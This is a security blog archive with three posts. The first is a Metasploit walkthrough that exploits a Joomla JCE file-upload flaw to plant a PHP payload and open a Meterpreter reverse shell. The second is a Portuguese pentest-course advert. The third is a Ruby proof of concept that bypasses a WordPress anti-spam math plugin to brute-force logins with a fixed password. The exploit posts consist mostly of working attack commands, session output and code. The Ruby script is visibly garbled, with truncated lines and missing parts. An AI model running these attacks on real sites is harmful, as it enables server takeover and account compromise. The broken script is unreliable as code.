Wednesday, March 27, 2013

Joomla Component JCE File Upload Remote Code Execution Metasploit Module


msf > use exploit/unix/webapp/joomla_comjce_imgmanager 
msf exploit(joomla_comjce_imgmanager) > info

       Name: Joomla Component JCE File Upload Remote Code Execution
     Module: exploit/unix/webapp/joomla_comjce_imgmanager
    Version: 0
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Heyder Andrade

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        Use a proxy chain
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       Joomla directory path
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

  This module exploits a vulnerability in the JCE component for 
  Joomla!, which could allow an unauthenticated remote attacker to 
  upload arbitrary files, caused by the fails to sufficiently sanitize 
  user-supplied input. Sending specially-crafted HTTP request, a 
  remote attacker could exploit this vulnerability to upload a 
  malicious PHP script, which could allow the attacker to execute 
  arbitrary PHP code on the vulnerable system. This module has been 
  tested successfully on the JCE Editor 1.5.71 and Joomla 1.5.26.


msf exploit(joomla_comjce_imgmanager) > set RHOST
msf exploit(joomla_comjce_imgmanager) > exploit 

[*] Started reverse handler on 
[*] Checking component version to
[+] Successfully uploaded cpizwa.gif
[*] Change Extension from cpizwa.gif to cpizwa.php
[+] Renamed cpizwa.gif to cpizwa.php
[*] Calling payload: cpizwa.php
[*] Sending stage (39217 bytes) to
[*] Meterpreter session 1 opened ( -> at Wed Mar 27 22:14:31 -0300 2013
[+] Deleted cpizwa.php

meterpreter > getuid 
Server username: www-data (33)
meterpreter > shell
Process 7445 created.
Channel 0 created.
Terminate channel 0? [y/N]  y
meterpreter > quit
[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit
msf exploit(joomla_comjce_imgmanager) > 


Thursday, March 21, 2013

Curso – Pentest Hands ON!

Este curso oferece as principais técnicas para a condução de um pentest (Teste de Intrusão) remoto nos dias atuais. O curso é 100% prático e aborda novos e antigos métodos, técnicas e ferramentas que são utilizadas na condução de um pentest  remoto. Para isso, serão utilizados laboratórios reais (on-line), sem as famosas máquinas virtuais cheias de vulnerabilidades viciadas e que não condizem com a realidade.
Os resultados dos testes serão baseados em cenários reais, que irão certificar o aluno a conduzir um pentest e produzir um relatório comercial. No final do curso o aluno sairá capacitado para realizar um pentest remoto e identificar vulnerabilidades e ameaças, descobrindo os riscos e níveis de criticidade em cada vulnerabilidade ou ataque remoto no ambiente testado.

Friday, August 19, 2011

WordPress "Block-Spam-By-Math-Reloaded" plugin bypass

"Plugin description: This plugin protects your Wordpress 3.x login, comments, and new user/new blog signup process against spambots with a simple math question."


However this simple math question is very simple and can be easily bypassed. The plugin generates two random numbers between 2 and 15 and asks the user to enter their sum.

The script below is a PoC of how to bypass the plugin in the wp-login.php page.

#!/usr/bin/env ruby

require 'uri'
require 'net/http'
require 'cgi'

# Request Config
base_url = "http://[TAGERT]/wp-login.php"

# Proxy Config
use_proxy = true
proxy_address = ''
proxy_port = '8080'

# Headers config
useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20060111 Firefox/'
headers = {
'Host' => URI.parse(base_url).host,
'Content-Type' => 'application/x-www-form-urlencoded',
'User-Agent' => useragent,
'Cookie' => cookie

# do request
def built_request(url,use_proxy,proxy_address,proxy_port)
if (use_proxy)
http =,url.port,proxy_address,proxy_port)
return http
http =,url.port)
return http

def smartaleck(values)
answer = 0
values.each { |a| answer+=a.to_i }
return answer

def getvalues(response)
i = 0
values = []
while (i <= 1) do
values[i] = $3
i += 1
return values

# base request
url = URI.parse(base_url)
$http = built_request(url,use_proxy,proxy_address,proxy_port)
resp = $http.request_get(url.path)

v = getvalues(resp)
$sec_answer = smartaleck(v)
puts "#{v[0]} + #{v[1]} = #{$sec_answer}"

# File contains one user per line
users ='files/user.txt','r')

# Fixed password
pass = '123456'

users.each do |user|
payload = "log=#{user.chomp}&pwd=#{pass}&mathvalue2=#{$sec_answer}&mathvalue0=#{v[0]}&mathvalue1=#{v[1]}&wp-submit=Log+In&redirect_to=#{CGI::escape("http://""/wp-admin/")}&testcookie=1"
resp = $http.request_post(url.path, payload, headers)
v = getvalues(resp)
$sec_answer = smartaleck(v)
puts "#{v[0]} + #{v[1]} = #{$sec_answer}"
rescue Timeout::Error
puts "Time out"


I believe the good and old captacha, well implemented, yet is a better solution for these cases.